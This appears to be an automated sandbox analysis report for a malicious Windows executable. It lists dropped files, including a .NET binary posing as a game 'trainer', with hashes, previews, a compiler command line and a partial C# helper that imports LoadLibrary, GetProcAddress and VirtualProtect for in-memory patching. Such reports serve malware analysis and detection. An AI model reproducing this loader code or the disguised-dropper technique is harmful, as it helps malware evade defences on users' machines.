                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.X..............F.....L.......L.......L.......L...................Y.....................*.............Rich............PE..d......a.........." .....J...4.......L..........Bi7.......................................`..........................................t..H....v.......................................d..T...........................Pe..8............`..0............................text...!H.......J.................. ..`.rdata.......`... ...N..............@..@.data................n..............@....pdata...............r..............@..@.rsrc................x..............@..@.reloc...............z..............@..B........................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\RES8530.tmp

                                                                        Download File
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Oct 15 15:54:47 2024, 1st section name ".debug$S"
                                                                        Category:dropped
                                                                        Size (bytes):1332
                                                                        Entropy (8bit):3.9793649376197076
                                                                        Encrypted:false
                                                                        SSDEEP:24:HjKFzW916dUVEHdrfwKqxmNII+ycuZhN6lakS7KPNnqS2d:DWdUy98Kqxmu1ulea3KqSG
                                                                        MD5:B1E669332478A299C3037608E1EF6BB7
                                                                        SHA1:CA424BEEFE4CC6EAFB009D04DEC3AB9B11BAFDB4
                                                                        SHA-256:A38C1AA71FF60994320913EAE0EA8374E78D18CA84E1D83C60D63B25352F773A
                                                                        SHA-512:95B62C113A6B82E218155F3F49E8432C574A1C9FE47D3553E9162EA8D19D85EFC7D29663652C78796A1DB6AEDF1D2F78F0A0094DB53BC969FC076F36A5D8E8F6
                                                                        Malicious:false
                                                                        Preview:L...G..g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\rlfwipso\CSC770B74A1B374466B59916F033873949.TMP...............>.........I.C$..........5.......C:\Users\user\AppData\Local\Temp\RES8530.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.l.f.w.i.p.s.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                                        C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):56320
                                                                        Entropy (8bit):2.33688169239766
                                                                        Encrypted:false
                                                                        SSDEEP:384:fcSG5Fnm1dQ1ej1YFmq/KFnp4H7OIcu7VYSEtuhjRTK6xZbkvwKwq6uiPmo/PmU:kvUdacFnp67ONu7xEW1XxeseU
                                                                        MD5:BECD67D75C5E7C2411E9F481086CA1E0
                                                                        SHA1:F7F5F1A3AFB7E3454797B2CAD62D298BB1B20345
                                                                        SHA-256:E87B1FCB789B6957B5C99A1393738E928D3918F1E46DB20F761D57AD015AA385
                                                                        SHA-512:D86DA68BA9BD3C992B33C99A3B96DFFEA3032E9B769A91A7FED33EC654E48A61A6E6715C630080D5D5E6390F4FC09B398111EAAAD60E3304B552DD0AC353B67E
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0......T........... .....@..... ....................... ............`...@......@............... ...................................R........................................................................................... ..H............text........ ...................... ..`.rsrc....R.......T..................@..@........................................H........2...#......!....U...O............................................(....*6.(.....( ...*..(....*.(....*.(....,..(....*.{....r...po.....{....o....*.0..I........{....o........(.......(.....(Y(.......(.......(.....LY(.....{.....o....*z(....,..{....o.....{....o....*J.{....o.....(....*..{....r9..po....(.....{....o....*....0..F.......(......,<.{....o......3..{....rc..po....+..{....rq..po.....{....o....*...0..y.........s ...%%o!...j(....o".....o#...,J.r...p($...-..r...p($...-".r...p($

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1istzkbc.ti2.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ttzo1vo.a3i.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5v1la4gh.yni.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfdc00xi.rjy.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3vccvsu.w3b.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljgnogbs.zhy.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nsc3nxof.kov.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjtrlqj1.l4v.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4vkemcq.rkw.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xgrhaddf.zq3.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\rlfwipso\CSC770B74A1B374466B59916F033873949.TMP

                                                                        Download File
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        File Type:MSVC .res
                                                                        Category:dropped
                                                                        Size (bytes):652
                                                                        Entropy (8bit):3.0776654809300967
                                                                        Encrypted:false
                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryQWKak7Ynqq7W7PN5Dlq5J:+RI+ycuZhN6lakS7KPNnqX
                                                                        MD5:3EE8D301EF89F3A0E819F4B549AF4324
                                                                        SHA1:9341A5F5384FE8D0EBF165CC76C28F04EAF279C1
                                                                        SHA-256:28EF8A3AE0B95442472C2321510EF02F3B87A692E82E6A4505878E83CF05CD96
                                                                        SHA-512:90CB4B21C9F623762D019D7EF1A9BBE2BA9A69A4DF2C502CAE494FDF2EE0EDFA053FE1CD3238EC5CDDCDC71082EE1CF2ACEA34B13FB523F672715B9DAB54015F
                                                                        Malicious:false
                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.l.f.w.i.p.s.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.l.f.w.i.p.s.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                        C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.0.cs

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text
                                                                        Category:dropped
                                                                        Size (bytes):1140
                                                                        Entropy (8bit):4.751587839856729
                                                                        Encrypted:false
                                                                        SSDEEP:24:JjajwGHNw7+qFhL/+PS+oXG4mnF1D7ZTHtws4bx:JjaEGHNw7+Ib+6+oXZIF17Zrtws4bx
                                                                        MD5:FE35992F552A2057291C867108A5C2EB
                                                                        SHA1:3359CC35D11E68B353BBF06D03F1A9937E2689EE
                                                                        SHA-256:C6CD29B3B2981C29538DEB9B4445A10EC4993E93F058621F49E6AE294B4B6D1F
                                                                        SHA-512:8E639DB3A4696FFD380C495CF816B2571656D51AEA0B3DA75FBFC7151F1DE704FE1508FF61C95FC2AC2EF230FD6FEE48536C074D71F025675103B737128E9DFF
                                                                        Malicious:false
                                                                        Preview:.using System;.using System.Runtime.InteropServices;..public class MyUtilityClass {. // Renamed class for clarity.. // Additional variables. private const string Kernel32Library = "kernel32";. . // Function declarations. [DllImport(Kernel32Library)]. public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);.. [DllImport(Kernel32Library)]. public static extern IntPtr LoadLibrary(string name);.. [DllImport(Kernel32Library)]. public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);.. // Additional method for clarity. public static IntPtr LoadLibraryAndGetProcAddress(string libraryName, string procName) {. IntPtr hModule = LoadLibrary(libraryName);. if (hModule == IntPtr.Zero) {. throw new Exception("Failed to load library: " + libraryName);. }.. IntPtr procAddress = GetProcAddress(hModule, procName);. if (procAddress == In

                                                                        C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.cmdline

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):371
                                                                        Entropy (8bit):5.166383701178749
                                                                        Encrypted:false
                                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fVnDJUzxs7+AEszI923fVnP:p37Lvkmb6KzdnVUWZE2dnP
                                                                        MD5:F229F648D208FDA9FFC2B3A5DD68B6AC
                                                                        SHA1:CF1CDE081F3BA08E9070C4D1F8BC50D6DC4D4F3D
                                                                        SHA-256:038419E6071A72459BEC35CC661AFBC9B7CB523C90CF2D7DB89652CA83B99E43
                                                                        SHA-512:BFA24E835620B22A0F631C28365BC1965FD88DB2053FF5E45402DAC714AEF6B203247A58F8A760850683415FCA16EFBE5DFAAD32DA9E0BBD1313CD0A0CADEA54
                                                                        Malicious:true
                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.0.cs"

                                                                        C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.dll

                                                                        Download File
                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):4096
                                                                        Entropy (8bit):2.9753157496493152
                                                                        Encrypted:false
                                                                        SSDEEP:48:69zpLNvhfeRPBFLEPKhSJ65CXumwdvV1ulea3Kq:2JhfeR5dEs55GgK
                                                                        MD5:CDA913C03E0C9B3D48364A6AFFC561D4
                                                                        SHA1:2C423E293B5CB8D7F127C394C3C592EE016331A6
                                                                        SHA-256:2D2314435AC86DECE4136C9E7FB5A262F166F565A8E135B424FFE05116FCC844
                                                                        SHA-512:C01C813621606AE7FC543D4867183FB5FAF56C329F445990933FCC29EDCE2354EE21247989553D6700393CA225552DAD647D4D3E41F45B074138C786F9AFD6E7
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0..M........(......~....(....,.r...p.(....s....z..(......~....(....,.r3..p.(....s....z.*..(....*...BSJB............v4.0.30319......l.......#~..$.......#Strings........x...#US.d.......#GUID...t.......#Blob...........W.........%3........................................................................6./.........5.....U.....|......./...../...../.............................Q.=.......... M............ \.$...

                                                                        C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.out

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                        Category:modified
                                                                        Size (bytes):872
                                                                        Entropy (8bit):5.26858235950681
                                                                        Encrypted:false
                                                                        SSDEEP:24:KMoId3ka6KzdnLE2dn2Kax5DqBVKVrdFAMBJTH:dokka6adnLE2dn2K2DcVKdBJj
                                                                        MD5:BA63D202D11B739B999850C59EA50CBC
                                                                        SHA1:33C3D310DC37EA670AC8459F8303275CD88E41DA
                                                                        SHA-256:893431E6D36BDCC0F59918EF7416D35A4101F849291B8A3030FCFBAE3B5E40D1
                                                                        SHA-512:B76265A6E06CFCCE2732E0BA144E028836F0F4B0EF2E33F09CAED5ECDF31CF44CB780FD2C7B1DF6AD50E60178ABB3E2E69A870BAD1632564B3DCE3A905CC0FD3
                                                                        Malicious:false
                                                                        Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):55
                                                                        Entropy (8bit):4.306461250274409
                                                                        Encrypted:false
                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                        Malicious:false
                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Entropy (8bit):5.9957961480960105
                                                                        TrID:
                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:xK44OOt7vD.exe
                                                                        File size:116'736 bytes
                                                                        MD5:5e40e28eed9c4ede7b34b64b6c58571c
                                                                        SHA1:61aef6b48e463a70a8bb414c43b497e0b4759f04
                                                                        SHA256:1e4a2d67df3b0a1f2d1f5d3af6587f9f222adf40c0a9d4976fc78a21d9efa5b5
                                                                        SHA512:07c12702eba320b6d1a05164bdbb17f4761d8f62eca03b1ccee149f0e694aa81c38ebdce85bd5f55874a788cc4df399ac82cdfa30a296dffe0cb4d86a659a3fb
                                                                        SSDEEP:3072:JQC4dsDFmTPIv/QYMwFA4tHaF7rEekeciY5wBUKzV:QCDFmTPIv/vFA4t6F7tkebBUE
                                                                        TLSH:50B35C4B76E131F8E1768279C8624A04E776B4324710EFAF03A4436A1F236D68D3EF61
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................................................................................................=.............Rich...........

                                                                        File Icon

                                                                        Icon Hash:00928e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x140002148
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x140000000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x66C21BCD [Sun Aug 18 16:05:33 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:6
                                                                        OS Version Minor:0
                                                                        File Version Major:6
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:6
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:40a549ffe615ad2c830f4fd2287b00be

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        dec eax
                                                                        sub esp, 28h
                                                                        call 00007F6E08956E64h
                                                                        dec eax
                                                                        add esp, 28h
                                                                        jmp 00007F6E089567CFh
                                                                        int3
                                                                        int3
                                                                        inc eax
                                                                        push ebx
                                                                        dec eax
                                                                        sub esp, 20h
                                                                        dec eax
                                                                        mov ebx, ecx
                                                                        xor ecx, ecx
                                                                        call dword ptr [0000EF0Bh]
                                                                        dec eax
                                                                        mov ecx, ebx
                                                                        call dword ptr [0000EEFAh]
                                                                        call dword ptr [0000EE8Ch]
                                                                        dec eax
                                                                        mov ecx, eax
                                                                        mov edx, C0000409h
                                                                        dec eax
                                                                        add esp, 20h
                                                                        pop ebx
                                                                        dec eax
                                                                        jmp dword ptr [0000EEF0h]
                                                                        dec eax
                                                                        mov dword ptr [esp+08h], ecx
                                                                        dec eax
                                                                        sub esp, 38h
                                                                        mov ecx, 00000017h
                                                                        call dword ptr [0000EEE4h]
                                                                        test eax, eax
                                                                        je 00007F6E08956959h
                                                                        mov ecx, 00000002h
                                                                        int 29h
                                                                        dec eax
                                                                        lea ecx, dword ptr [00019A4Ah]
                                                                        call 00007F6E08956B1Eh
                                                                        dec eax
                                                                        mov eax, dword ptr [esp+38h]
                                                                        dec eax
                                                                        mov dword ptr [00019B31h], eax
                                                                        dec eax
                                                                        lea eax, dword ptr [esp+38h]
                                                                        dec eax
                                                                        add eax, 08h
                                                                        dec eax
                                                                        mov dword ptr [00019AC1h], eax
                                                                        dec eax
                                                                        mov eax, dword ptr [00019B1Ah]
                                                                        dec eax
                                                                        mov dword ptr [0001998Bh], eax
                                                                        dec eax
                                                                        mov eax, dword ptr [esp+40h]
                                                                        dec eax
                                                                        mov dword ptr [00019A8Fh], eax
                                                                        mov dword ptr [00019965h], C0000409h
                                                                        mov dword ptr [0001995Fh], 00000001h
                                                                        mov dword ptr [00019969h], 00000001h

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1a66c0x3c.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x200000x1e0.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d0000x10d4.pdata
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x210000x680.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x18b300x70.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x189f00x140.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x110000x278.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
